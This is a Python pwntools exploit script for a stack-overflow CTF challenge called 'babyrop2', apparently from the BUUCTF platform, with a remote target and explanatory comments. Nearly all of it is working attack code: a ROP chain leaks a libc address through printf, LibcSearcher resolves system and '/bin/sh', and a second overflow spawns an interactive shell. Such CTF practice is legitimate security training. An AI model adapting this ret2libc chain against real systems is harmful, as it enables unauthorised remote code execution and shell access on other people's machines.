简单的栈溢出
from LibcSearcher import *
from pwn import *
# pwntools setup: spawn gdb/processes in terminator; 'debug' echoes every byte sent
# and received (including the leaked pointer) -- useful while developing, very noisy.
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = 'debug'
# Target switch read by main(): 1 = local ./babyrop2, anything else = the remote service.
content: int = 0
elf = ELF('./babyrop2')
# Address handed to printf in rdi; presumably a "%s"-style format string inside the
# binary (hard-coded 0x40xxxx addresses imply a non-PIE build) -- TODO confirm via disassembly.
format_str: int = 0x0400770
print_plt = elf.plt['printf']   # printf@plt, used to print the contents of read@got
read_got = elf.got['read']      # GOT slot holding the resolved libc address of read()
main_addr = elf.sym['main']     # returned to after the leak so the overflow can be hit again
# ROP gadgets, hard-coded for this build (presumably the __libc_csu_init tail):
#   0x400733: pop rdi; ret
#   0x400731: pop rsi; pop r15; ret   (r15 receives a junk qword)
pop_rdi: int = 0x400733
pop_rsi_r15: int = 0x400731
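def _parse_leak(raw: bytes) -> int:
    """Decode the read@got pointer that printf echoed back.

    ``raw`` is everything received up to and including the first 0x7f byte, so
    its last six bytes are the little-endian user-space pointer (0x7fXXXXXXXXXX).
    Zero-extending those six bytes is equivalent to the usual
    ``u64(raw[-6:].ljust(8, b'\\x00'))`` idiom.

    Caveat: printf("%s") stops at the first NUL byte, so a libc address whose
    low byte happens to be 0x00 comes back truncated and decodes wrongly.
    """
    return int.from_bytes(raw[-6:], 'little')


def _leak_chain() -> bytes:
    """First-stage ROP chain: printf(format_str, &read@got), then return to main().

    0x20 bytes fill the buffer and 8 more overwrite the saved rbp before the
    return address (offsets as used by the original exploit -- re-check with a
    cyclic pattern if the binary is rebuilt).
    """
    return (
        b'a' * (0x20 + 8)
        + p64(pop_rdi) + p64(format_str)             # rdi = format string
        + p64(pop_rsi_r15) + p64(read_got) + p64(0)  # rsi = &read@got, r15 = junk
        + p64(print_plt)                             # printf@plt leaks the GOT entry
        + p64(main_addr)                             # back to main for the second overflow
    )


def _shell_chain(system_addr: int, binsh_addr: int) -> bytes:
    """Second-stage ROP chain: system("/bin/sh") with the resolved libc addresses."""
    # NOTE(review): on newer glibc, system() can fault (movaps) if rsp is not
    # 16-byte aligned at the call; if that happens, prepend a lone `ret` gadget.
    # The original chain is reproduced unchanged here.
    return b'a' * (0x20 + 8) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)


def main() -> None:
    """Leak read@libc via printf, identify libc with LibcSearcher, then ret2system.

    Targets the local binary when the module-level ``content`` is 1, otherwise
    the remote CTF service. Ends in an interactive session on the shell.
    """
    if content == 1:
        p = process('./babyrop2')
    else:
        p = remote("node4.buuoj.cn", 26275)

    # Stage 1: first overflow -- leak the GOT entry of read().
    # Delimiters are bytes: a str here only works through pwntools' implicit
    # ASCII conversion, which emits a BytesWarning.
    p.recvuntil(b"What's your name? ")
    p.sendline(_leak_chain())
    read_addr = _parse_leak(p.recvuntil(b'\x7f'))
    log.success('read@libc = %#x', read_addr)

    # Stage 2: resolve libc from the leak and compute system/"/bin/sh".
    libc = LibcSearcher('read', read_addr)
    libc_base = read_addr - libc.dump('read')
    # A real libc base is page-aligned; anything else means LibcSearcher matched
    # the wrong build and every address derived below would be garbage.
    if libc_base & 0xfff:
        log.error('libc base %#x is not page-aligned: wrong libc candidate?', libc_base)
    system_addr = libc_base + libc.dump('system')
    binsh_addr = libc_base + libc.dump('str_bin_sh')
    log.info('libc base = %#x, system = %#x, /bin/sh = %#x', libc_base, system_addr, binsh_addr)

    # Stage 3: main() ran again, so overflow once more and call system("/bin/sh").
    p.recvuntil(b"What's your name? ")
    p.sendline(_shell_chain(system_addr, binsh_addr))
    p.interactive()


if __name__ == '__main__':
    main()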